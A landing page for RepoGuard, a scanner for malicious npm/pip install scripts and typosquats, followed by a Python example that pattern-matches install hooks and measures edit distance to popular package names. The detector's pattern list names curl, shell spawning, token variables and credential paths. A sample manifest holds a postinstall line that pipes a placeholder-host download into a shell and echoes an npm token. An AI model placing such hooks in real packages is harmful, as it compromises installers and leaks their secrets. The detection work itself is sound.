Scan any repo or package for hidden malware
Paste a GitHub repo or an npm / pip package. RepoGuard flags malicious install scripts, obfuscated payloads, typosquats and reputation risks — and explains exactly what's wrong in plain English.
Six checks on every scan
No CVE feeds, no waiting. RepoGuard reads the same public signals an attacker hopes you'll skip.
Install-script analysis
Detects pre/post-install hooks that download remote payloads, spawn shells, read your env vars or touch credential paths — the #1 npm/pip attack vector.
Typosquat detection
Edit-distance matching against the most-installed packages catches look-alikes like crossenv, loadsh or expresss before they reach your lockfile.
Obfuscation & payload flags
Spots long hex blobs, heavy escape-sequence encoding and eval-of-minified code that hide a malicious payload inside readable-looking source.
Reputation red flags
Weighs package age, download volume, maintainer count and repo stars so a brand-new zero-download dependency never sneaks in unnoticed.
Plain-English risk reports
Not a CVE dump. A clear verdict — install, be careful, or don't — with the single most important reason and a concrete next step.
Safer-alternative suggestions
When something looks like a typosquat, RepoGuard names the legitimate package it's imitating so you can fix the install in one step.
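An added example of the install-hook, typosquat and safer-alternative checks described above, written independently of RepoGuard (not its code): a small Python scanner that flags suspicious pre/post-install commands in a package.json, runs edit-distance matching against a list of popular npm packages, and names the legitimate package a look-alike imitates. The popular-package list, the suspicious-command patterns and the sample manifest are constructed for illustration.

```python
import json
import re
# Constructed, illustrative list of widely installed npm packages (not RepoGuard's real list).
POPULAR_PACKAGES = ["express", "lodash", "cross-env", "react", "chalk", "axios", "request"]

# Illustrative patterns for hooks that fetch remote code, spawn a shell, read env vars or touch credential paths.
SUSPICIOUS_HOOK_PATTERNS = [
    r"\bcurl\b", r"\bwget\b", r"\b(ba)?sh\s+-c\b", r"\bprocess\.env\b",
    r"\$[A-Z_]*(TOKEN|KEY|SECRET)\b", r"~/\.(aws|ssh|npmrc)", r"\beval\(",
]

def levenshtein(a, b):
    """Classic dynamic-programming edit distance between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def normalize(name):
    # Drop separators so 'crossenv' compares against 'cross-env' at distance 0.
    return re.sub(r"[-_.]", "", name.lower())

def typosquat_target(name, popular=POPULAR_PACKAGES, max_distance=2):
    """Name the popular package `name` imitates, or None if it is legitimate or unrelated."""
    if name in popular:
        return None
    best = min(popular, key=lambda p: levenshtein(normalize(name), normalize(p)))
    return best if levenshtein(normalize(name), normalize(best)) <= max_distance else None

def suspicious_hooks(manifest):
    """Map each pre/post-install hook to the suspicious patterns its command matches."""
    findings = {}
    for hook in ("preinstall", "install", "postinstall"):
        cmd = manifest.get("scripts", {}).get(hook, "")
        hits = [p for p in SUSPICIOUS_HOOK_PATTERNS if re.search(p, cmd)]
        if hits:
            findings[hook] = hits
    return findings

def scan(manifest_json):
    manifest = json.loads(manifest_json)
    name = manifest.get("name", "")
    return {"name": name, "typosquat_of": typosquat_target(name), "hooks": suspicious_hooks(manifest)}

# Constructed sample manifest: a look-alike name with a hook that pipes a download into a shell.
SAMPLE_MANIFEST = json.dumps({"name": "loadsh", "scripts": {
    "postinstall": "curl -s https://example.invalid/s.sh | sh -c 'echo $NPM_TOKEN'"}})
```

Calling `scan(SAMPLE_MANIFEST)` reports `typosquat_of: "lodash"` and three matched patterns on the `postinstall` hook; a genuine `express` manifest with no hooks yields `typosquat_of: None` and an empty `hooks` map.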
Ship dependencies you can trust
Free for 5 scans a month. Go Pro for unlimited scans, a CI webhook and a drop-in GitHub Action.